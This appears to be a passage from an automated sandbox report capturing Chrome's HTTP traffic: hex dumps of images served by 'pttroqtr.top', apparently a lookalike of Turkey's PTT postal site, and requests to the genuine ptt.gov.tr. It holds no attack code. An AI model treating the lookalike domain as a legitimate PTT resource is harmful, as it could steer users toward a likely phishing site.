                                                                                                                                                                                            Content-Length: 27613
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"6bdd-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:38 UTC16073INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 6b 6a 49 44 41 54 78 da ec fd 4d 76 1a 4b 13 70 0b e7 79 d7 db 17 a7 fd 35 84 5b b7 29 ce 08 84 47 60 3c 02 e3 11 18 8f c0 78 04 c6 23 30 1a c1 c1 23 70 69 04 46 cd af 65 d4 b8 ed 83 46 f0 5c 05 8a 14 41 2a b3 fe a8 82 02 ed bd 16 4b 36 82 fa c9 2a 94 9b c8 cc 88 bf fe f7 bf ff 39 00 00 00 00 38 2d fe 42 e2 00 00 00 00 90 38 00 00 00 00 40 e2 00 00 00 00 00 89 03 00 00 00 40 e2 00 00 00 00 00 89 03 00 00 00 00 24 0e 00 00 00 00 89 03 00 00 00 00 24 0e 00 00 00 00 90 38 00 00 00 00
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<kjIDATxMvKpy5[)G`<x#0#piFeF\A*K6*98-B8@@$$8
                                                                                                                                                                                            2024-09-28 03:39:38 UTC11540INData Raw: 6b ae 6a 85 44 f7 3e e8 c3 05 02 b1 72 25 0a ca eb e2 95 af 2a 11 fd 03 0a 81 8d 1c fa 7f 97 f9 e2 70 90 c8 5b 8e c4 65 25 a4 f7 5a 1f 9f 02 d9 f6 b5 69 97 39 db 78 68 63 45 f8 9e d7 2b 56 a9 c1 7f be 00 4e 1e 86 53 e1 6c 30 c3 88 96 17 25 82 3a 70 9c 99 76 94 32 49 7c d4 c2 f6 a5 e3 fa ad ff 6d 74 c8 48 87 58 27 0d ca 5c 11 0f 46 ec 76 1e 4d 0b 83 b6 9b 1f 6e f4 ff ee b9 f2 95 0c 52 88 9c ce 8f 20 6f 85 f7 82 fe 7e a4 22 56 46 46 63 53 00 16 7a 3f 48 ee b5 61 87 3e 67 3d 97 ae b2 b2 d7 54 03 80 ae 40 24 0e ce 45 e0 86 91 0e 48 04 60 da c1 c3 f5 12 37 a8 79 ae 1b a9 48 45 18 35 42 e5 a3 7d 23 d7 e0 8a 41 dd 67 a6 c3 87 22 73 63 d7 ee f0 f5 85 db 46 87 c2 76 08 9f f2 85 db cb 30 68 f9 b8 a5 fd 45 da 66 47 8e 4e f9 2f 09 0f 89 4a 0d 4b f7 72 31 8c 1d 16 b6
                                                                                                                                                                                            Data Ascii: kjD>r%*p[e%Zi9xhcE+VNSl0%:pv2I|mtHX'\FvMnR o~"VFFcSz?Ha>g=T@$EH`7yHE5B}#Ag"scFv0hEfGN/JKr1


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            107192.168.2.5498358.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:38 UTC361OUTGET /help/layout/images/46.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:38 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:38 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 44008
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"abe8-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:38 UTC16073INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 ab 75 49 44 41 54 78 da ec bd 07 9c 64 65 95 bf ff bd 95 73 e8 1c a6 c3 e4 04 13 c8 41 60 08 8a 0a 4a 10 cc 0a 98 70 55 74 8c ab 6b 42 d7 8f eb ae ba 80 fe 95 dd fd ad 0b 6c 02 13 49 85 c5 48 4e ce 30 03 0c 30 c0 84 ee 9e 9e ce d5 dd 55 5d 39 fe df f3 d6 bd d5 b7 aa ab 7b 7a 66 3a 54 77 9f 67 3e 35 15 ba e2 ad 1b 9e 3a e7 3d e7 55 72 b9 1c 18 86 61 18 86 61 98 85 85 c2 12 c7 30 0c c3 30 0c c3 12 c7 30 0c c3 30 0c c3 b0 c4 31 0c c3 30 0c c3 30 2c 71 0c c3 30 0c c3 30 2c 71 0c c3 30
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<uIDATxdesA`JpUtkBlIHN00U]9{zf:Twg>5:=Uraa0000100,q00,q0
                                                                                                                                                                                            2024-09-28 03:39:38 UTC16384INData Raw: 05 2b 34 4f 2e 76 ec c2 84 c9 b4 26 79 af b9 ff 39 00 cf a5 a7 63 74 70 a8 f0 7d d2 89 c6 7c e6 fe 22 64 78 1e d7 57 45 37 2e 6e bc bd 10 4b 1c b3 d8 02 17 0c b3 b8 56 e8 2d da 78 38 7d 1a d5 80 99 49 a5 1e 0b d6 ce 98 1c 7b 95 7f 83 8a 14 0d 6a 8c 3a 74 df 63 70 1f c5 81 9c 06 fe 1b 2b 74 b9 d7 fe 76 10 03 7f 7c aa 48 e0 72 ea 18 b9 ea f6 d6 a2 99 1d ca 41 51 39 c3 49 ab e0 fc ec 85 72 f6 05 bd c0 69 11 36 12 e0 c9 28 27 70 b2 65 c8 24 cb 37 3f eb 44 b1 c0 d1 e5 b1 c1 a1 c9 df a4 c5 84 8d ff fa 79 d4 6e dd 78 cc 02 27 d3 a8 7f d8 89 fa ce ec a2 d8 de e8 07 48 ee b9 d7 8b 85 5a 90 3e d4 07 e7 3c 57 db 96 6e fb f9 7e 91 ca 16 de 4b 32 2c 71 0c 53 a1 88 9d f4 79 e5 fa c3 cd d4 78 b8 63 c1 d5 49 83 ef f3 07 37 0b 45 28 c4 01 3f 78 a8 1b e6 df f7 56 ac 94 1d
                                                                                                                                                                                            Data Ascii: +4O.v&y9ctp}|"dxWE7.nKV-x8}I{j:tcp+tv|HrAQ9Iri6('pe$7?Dynx'HZ><Wn~K2,qSyxcI7E(?xV
                                                                                                                                                                                            2024-09-28 03:39:38 UTC11551INData Raw: 89 a2 cf 61 fe d4 65 08 8f 8c 16 05 2e 26 96 ef e8 57 ee 80 f9 86 df a2 a1 5b 99 d1 bf 65 72 d8 8a e2 6b 29 f4 95 0d 3f 7f 08 fe 1f 75 9f b0 44 09 ad d3 5c 38 56 41 e0 d4 12 81 93 75 fa 32 0a ec 5d 27 8e 1c 7a c3 42 c6 bf ff 50 49 46 29 0d 1d d2 30 6b d6 61 99 b1 cf ee 0a e6 e0 fa f4 3d c8 fe e4 21 b1 9e db e5 50 64 f7 13 77 c3 56 db 80 d6 cf ff 35 86 aa 60 58 35 7c 9e 03 06 87 55 ec cb 4e f8 5a d6 22 9b 88 61 f0 fe df 62 fc 83 b7 63 c5 af 06 8a 43 d3 2d 0f c7 91 bd e5 d7 42 e4 f2 75 75 29 c9 21 19 1e 82 b3 6d 35 c6 bd 86 59 fe ae 97 0e a5 e6 f2 df 77 96 38 86 25 8e 61 16 2a 85 21 d5 db cb b3 54 67 ab f0 2f 21 e7 c3 25 53 b2 c1 bd c3 ef 83 92 4a a1 ff e6 ff 45 dd 2f fb 4b a2 56 a4 69 75 8f c5 61 7a f7 cf 61 7b e9 18 3c b5 35 72 7e 5c 2a 1a 85 ed b5 6b e7
                                                                                                                                                                                            Data Ascii: ae.&W[erk)?uD\8VAu2]'zBPIF)0ka=!PdwV5`X5|UNZ"abcC-Buu)!m5Yw8%a*!Tg/!%SJE/KViuaza{<5r~\*k


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            108192.168.2.549825185.220.152.264432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:38 UTC679OUTGET /Sayfalar/Posta/DigerPostaIslemleriUst.aspx HTTP/1.1
                                                                                                                                                                                            Host: www.ptt.gov.tr
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:38 UTC361INHTTP/1.1 404 Not Found
                                                                                                                                                                                            Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                            Keep-Alive: timeout=5
                                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                                            ETag: "243ff-APl8/WCAEh2rB7zwncVxTiEo0c0"
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:38 GMT
                                                                                                                                                                                            Content-Length: 148479
                                                                                                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                                                                                            2024-09-28 03:39:38 UTC6910INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 2f 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 2e 2e 2e 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 62 56 78 30 6d 68 48 70 48 56 57 62 6e 30 63 4f 36 46 44 79 43 30 39 77 38 2d 63 46 59 6a 52 64 30 6d 5f 78 36 42 46 42 5f 5f 41 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65
                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html lang="tr"><head><meta name="viewport" content="width=device-width"/><meta charSet="utf-8"/><meta name="description" content="..."/><meta name="google-site-verification" content="bVx0mhHpHVWbn0cO6FDyC09w8-cFYjRd0m_x6BFB__A"/><meta name
                                                                                                                                                                                            2024-09-28 03:39:38 UTC7271INData Raw: 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 6f 67 72 65 74 6d 65 6e 6c 65 72 2d 67 75 6e 75 2d 6b 61 6d 70 61 6e 79 61 73 69 22 3e 3c 73 70 61 6e 3e c3 96 c4 9f 72 65 74 6d 65 6e 6c 65 72 20 47 c3 bc 6e c3 bc 20 4b 61 6d 70 61 6e 79 61 73 c4 b1 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 65 73 6e 61 66 2d 76 65 2d 73 61 6e 61 74 6b 61 72 6c 61 72 2d 6b 61 6d 70 61 6e 79 61 73 69 22 3e 3c 73 70 61 6e 3e 45 73 6e 61 66 20 76 65 20 53 61 6e 61 74 6b c3 a2 72 6c 61 72 20 4b 61 6d 70 61 6e 79 61 73 c4 b1 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 61 6b 69 6c 6c 69 2d 65 73 6e 61 66 22 3e 3c 73 70 61 6e 3e 41 6b c4 b1 6c 6c c4 b1 20 45
                                                                                                                                                                                            Data Ascii: an></a></li><li><a href="/ogretmenler-gunu-kampanyasi"><span>retmenler Gn Kampanyas</span></a></li><li><a href="/esnaf-ve-sanatkarlar-kampanyasi"><span>Esnaf ve Sanatkrlar Kampanyas</span></a></li><li><a href="/akilli-esnaf"><span>Akll E
                                                                                                                                                                                            2024-09-28 03:39:38 UTC7271INData Raw: 79 65 20 54 61 61 68 68 c3 bc 74 6c c3 bc 3c 2f 61 3e 3c 75 6c 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 79 75 72 74 2d 69 63 69 2d 70 6f 73 74 61 2d 68 69 7a 6d 65 74 6c 65 72 69 2d 6f 7a 65 6c 2d 68 69 7a 6d 65 74 6c 65 72 22 3e c3 96 7a 65 6c 20 48 69 7a 6d 65 74 6c 65 72 3c 2f 61 3e 3c 75 6c 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 73 70 61 6e 3e 59 75 72 74 20 44 c4 b1 c5 9f c4 b1 20 50 6f 73 74 61 20 48 69 7a 6d 65 74 6c 65 72 69 3c 69 20 69 64 3d 22 68 61 73 4c 69 73 74 22 20 63 6c 61 73 73 3d 22 66 61 2d 73 6f 6c 69 64 20 66 61 2d 70 6c 75 73 22 3e 3c 2f 69 3e 3c 2f 73 70 61 6e 3e 3c 75 6c 3e 3c 6c 69 3e 3c 73 70 61 6e 3e 4d 65 6b 74 75 70 20 50 6f 73 74 61 73 c4 b1 20 47 c3 b6
                                                                                                                                                                                            Data Ascii: ye Taahhtl</a><ul></ul></li><li><a href="/yurt-ici-posta-hizmetleri-ozel-hizmetler">zel Hizmetler</a><ul></ul></li></ul></li><li><span>Yurt D Posta Hizmetleri<i id="hasList" class="fa-solid fa-plus"></i></span><ul><li><span>Mektup Postas G
                                                                                                                                                                                            2024-09-28 03:39:38 UTC7271INData Raw: 74 72 61 6e 73 66 65 72 6c 65 72 69 2d 75 70 74 22 3e 55 50 54 3c 2f 61 3e 3c 75 6c 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 61 72 61 2d 74 72 61 6e 73 66 65 72 6c 65 72 69 2d 65 75 72 6f 67 69 72 6f 2d 66 69 6e 61 6e 73 61 6c 2d 73 75 70 65 72 6d 61 72 6b 65 74 2d 65 66 73 2d 70 6f 73 74 61 6c 70 61 79 22 3e 45 46 53 3c 2f 61 3e 3c 75 6c 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 61 72 61 2d 74 72 61 6e 73 66 65 72 6c 65 72 69 2d 6d 6f 6e 65 79 67 72 61 6d 22 3e 4d 6f 6e 65 79 47 72 61 6d 3c 2f 61 3e 3c 75 6c 3e 3c 2f 75 6c 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 61 72 61 2d 74 72 61 6e 73 66 65 72 6c 65 72 69 2d 70 6f 73 74 61 6c 70 61 79 22 3e 50 6f 73 74 61
                                                                                                                                                                                            Data Ascii: transferleri-upt">UPT</a><ul></ul></li><li><a href="/para-transferleri-eurogiro-finansal-supermarket-efs-postalpay">EFS</a><ul></ul></li><li><a href="/para-transferleri-moneygram">MoneyGram</a><ul></ul></li><li><a href="/para-transferleri-postalpay">Posta
                                                                                                                                                                                            2024-09-28 03:39:38 UTC7271INData Raw: 3e 50 6f 73 74 61 20 4b 6f 64 75 20 53 6f 72 67 75 6c 61 6d 61 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 74 74 61 76 6d 2e 63 6f 6d 2f 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 2d 73 6f 6c 69 64 20 66 61 2d 62 75 69 6c 64 69 6e 67 22 3e 3c 2f 69 3e 3c 73 70 61 6e 3e 50 74 74 41 56 4d 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 69 6c 61 74 65 6c 69 2e 67 6f 76 2e 74 72 2f 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 2d 73 6f 6c 69 64 20 66 61 2d 62 75 69 6c 64 69 6e 67 22 3e 3c 2f 69 3e 3c 73 70 61 6e
                                                                                                                                                                                            Data Ascii: >Posta Kodu Sorgulama</span></a></li><li><a target="_blank" href="https://www.pttavm.com/"><i class="fa-solid fa-building"></i><span>PttAVM</span></a></li><li><a target="_blank" href="https://www.filateli.gov.tr/"><i class="fa-solid fa-building"></i><span
                                                                                                                                                                                            2024-09-28 03:39:38 UTC7271INData Raw: 68 74 2e 62 38 30 35 36 38 63 33 2e 70 6e 67 26 61 6d 70 3b 77 3d 36 34 30 26 61 6d 70 3b 71 3d 37 35 22 20 64 65 63 6f 64 69 6e 67 3d 22 61 73 79 6e 63 22 20 64 61 74 61 2d 6e 69 6d 67 3d 22 69 6e 74 72 69 6e 73 69 63 22 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 62 6f 74 74 6f 6d 3a 30 3b 72 69 67 68 74 3a 30 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 70 61 64 64 69 6e 67 3a 30 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 30 3b 68 65 69 67 68 74 3a 30 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67
                                                                                                                                                                                            Data Ascii: ht.b80568c3.png&amp;w=640&amp;q=75" decoding="async" data-nimg="intrinsic" style="position:absolute;top:0;left:0;bottom:0;right:0;box-sizing:border-box;padding:0;border:none;margin:auto;display:block;width:0;height:0;min-width:100%;max-width:100%;min-heig
                                                                                                                                                                                            2024-09-28 03:39:38 UTC7271INData Raw: 30 64 35 66 32 2d 36 65 64 65 2d 34 34 31 66 2d 39 35 31 31 2d 63 61 65 32 31 31 65 35 66 33 31 32 22 2c 22 6c 61 6e 67 75 61 67 65 49 64 22 3a 31 2c 22 76 61 6c 75 65 22 3a 22 48 47 53 22 2c 22 76 61 6c 75 65 54 79 70 65 22 3a 31 2c 22 73 6c 75 67 22 3a 6e 75 6c 6c 7d 5d 7d 2c 7b 22 75 69 64 22 3a 22 65 37 37 62 36 36 61 39 2d 32 31 39 34 2d 34 64 33 63 2d 38 31 33 34 2d 63 66 33 34 65 35 37 62 63 31 31 35 22 2c 22 6d 65 6e 75 49 64 22 3a 31 30 35 2c 22 70 61 72 65 6e 74 4d 65 6e 75 49 64 22 3a 30 2c 22 69 63 6f 6e 22 3a 22 66 61 2d 73 6f 6c 69 64 20 66 61 2d 68 6f 75 73 65 2d 63 72 61 63 6b 22 2c 22 73 6c 75 67 22 3a 22 23 52 69 67 68 74 4d 65 6e 75 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 74 74 73 69 67 6f 72 74 61 2e 63 6f 6d
                                                                                                                                                                                            Data Ascii: 0d5f2-6ede-441f-9511-cae211e5f312","languageId":1,"value":"HGS","valueType":1,"slug":null}]},{"uid":"e77b66a9-2194-4d3c-8134-cf34e57bc115","menuId":105,"parentMenuId":0,"icon":"fa-solid fa-house-crack","slug":"#RightMenu","url":"https://www.pttsigorta.com
                                                                                                                                                                                            2024-09-28 03:39:38 UTC7271INData Raw: 6f 6e 22 3a 22 22 2c 22 73 6c 75 67 22 3a 22 23 4d 65 67 61 4d 65 6e 75 22 2c 22 75 72 6c 22 3a 6e 75 6c 6c 2c 22 69 73 4d 65 6e 75 4f 70 65 6e 22 3a 66 61 6c 73 65 2c 22 6c 61 6e 67 75 61 67 65 52 65 73 6f 75 72 63 65 73 22 3a 5b 7b 22 75 69 64 22 3a 22 64 61 30 62 30 61 37 66 2d 38 33 65 65 2d 34 34 61 32 2d 39 65 30 30 2d 32 35 33 37 38 62 66 34 35 66 37 36 22 2c 22 73 6f 75 72 63 65 55 69 64 22 3a 22 65 62 37 39 65 63 38 39 2d 61 63 38 35 2d 34 66 66 37 2d 38 34 35 38 2d 62 62 36 31 36 30 64 38 65 65 66 61 22 2c 22 6c 61 6e 67 75 61 67 65 49 64 22 3a 31 2c 22 76 61 6c 75 65 22 3a 22 42 69 72 6c 65 c5 9f 69 6b 20 50 6f 73 74 61 20 41 76 61 6e 74 61 6a 6c 61 72 22 2c 22 76 61 6c 75 65 54 79 70 65 22 3a 31 2c 22 73 6c 75 67 22 3a 22 62 69 72 6c 65 73 69
                                                                                                                                                                                            Data Ascii: on":"","slug":"#MegaMenu","url":null,"isMenuOpen":false,"languageResources":[{"uid":"da0b0a7f-83ee-44a2-9e00-25378bf45f76","sourceUid":"eb79ec89-ac85-4ff7-8458-bb6160d8eefa","languageId":1,"value":"Birleik Posta Avantajlar","valueType":1,"slug":"birlesi
                                                                                                                                                                                            2024-09-28 03:39:38 UTC7271INData Raw: 6e 75 49 64 22 3a 31 31 38 2c 22 69 63 6f 6e 22 3a 22 22 2c 22 73 6c 75 67 22 3a 22 23 4d 65 67 61 4d 65 6e 75 22 2c 22 75 72 6c 22 3a 22 22 2c 22 69 73 4d 65 6e 75 4f 70 65 6e 22 3a 66 61 6c 73 65 2c 22 6c 61 6e 67 75 61 67 65 52 65 73 6f 75 72 63 65 73 22 3a 5b 7b 22 75 69 64 22 3a 22 30 63 38 61 39 37 65 30 2d 32 63 64 37 2d 34 33 32 37 2d 61 65 30 38 2d 32 38 64 35 62 66 65 32 35 65 35 64 22 2c 22 73 6f 75 72 63 65 55 69 64 22 3a 22 36 35 66 65 66 64 31 64 2d 39 31 37 37 2d 34 63 35 39 2d 62 38 65 63 2d 39 61 32 63 37 61 36 38 34 37 32 61 22 2c 22 6c 61 6e 67 75 61 67 65 49 64 22 3a 31 2c 22 76 61 6c 75 65 22 3a 22 4f 6e 6c 69 6e 65 20 42 61 c5 9f 76 75 72 75 20 76 65 20 c3 96 6e 20 42 61 c5 9f 76 75 72 75 22 2c 22 76 61 6c 75 65 54 79 70 65 22 3a 31
                                                                                                                                                                                            Data Ascii: nuId":118,"icon":"","slug":"#MegaMenu","url":"","isMenuOpen":false,"languageResources":[{"uid":"0c8a97e0-2cd7-4327-ae08-28d5bfe25e5d","sourceUid":"65fefd1d-9177-4c59-b8ec-9a2c7a68472a","languageId":1,"value":"Online Bavuru ve n Bavuru","valueType":1
                                                                                                                                                                                            2024-09-28 03:39:38 UTC7271INData Raw: 75 6c 2d 6d 75 7a 65 73 69 2d 74 61 72 69 68 63 65 22 7d 5d 7d 2c 7b 22 75 69 64 22 3a 22 66 39 35 35 66 62 30 33 2d 63 61 32 62 2d 34 39 64 61 2d 62 66 36 32 2d 33 37 32 62 63 38 61 64 63 33 65 34 22 2c 22 6d 65 6e 75 49 64 22 3a 31 31 31 31 33 2c 22 70 61 72 65 6e 74 4d 65 6e 75 49 64 22 3a 31 31 31 31 32 2c 22 69 63 6f 6e 22 3a 22 22 2c 22 73 6c 75 67 22 3a 22 23 4d 65 6e 75 22 2c 22 75 72 6c 22 3a 22 23 50 61 67 65 22 2c 22 69 73 4d 65 6e 75 4f 70 65 6e 22 3a 66 61 6c 73 65 2c 22 6c 61 6e 67 75 61 67 65 52 65 73 6f 75 72 63 65 73 22 3a 5b 7b 22 75 69 64 22 3a 22 31 64 66 37 37 62 65 35 2d 65 37 30 33 2d 34 38 61 32 2d 38 34 30 39 2d 62 64 39 63 32 37 65 32 37 65 35 31 22 2c 22 73 6f 75 72 63 65 55 69 64 22 3a 22 66 39 35 35 66 62 30 33 2d 63 61 32 62
                                                                                                                                                                                            Data Ascii: ul-muzesi-tarihce"}]},{"uid":"f955fb03-ca2b-49da-bf62-372bc8adc3e4","menuId":11113,"parentMenuId":11112,"icon":"","slug":"#Menu","url":"#Page","isMenuOpen":false,"languageResources":[{"uid":"1df77be5-e703-48a2-8409-bd9c27e27e51","sourceUid":"f955fb03-ca2b


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            109192.168.2.549826185.220.152.264432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:38 UTC606OUTGET /_next/static/css/fdc30eafd5b8da2a.css HTTP/1.1
                                                                                                                                                                                            Host: www.ptt.gov.tr
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: text/css,*/*;q=0.1
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: style
                                                                                                                                                                                            Referer: https://www.ptt.gov.tr/Sayfalar/Posta/DigerPostaIslemleriUst.aspx
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:38 UTC387INHTTP/1.1 200 OK
                                                                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                                                                            Keep-Alive: timeout=5
                                                                                                                                                                                            Content-Type: text/css; charset=UTF-8
                                                                                                                                                                                            Last-Modified: Thu, 12 Sep 2024 09:54:30 GMT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            ETag: W/"2a22e-191e5a7dff0"
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:38 GMT
                                                                                                                                                                                            Content-Length: 172590
                                                                                                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
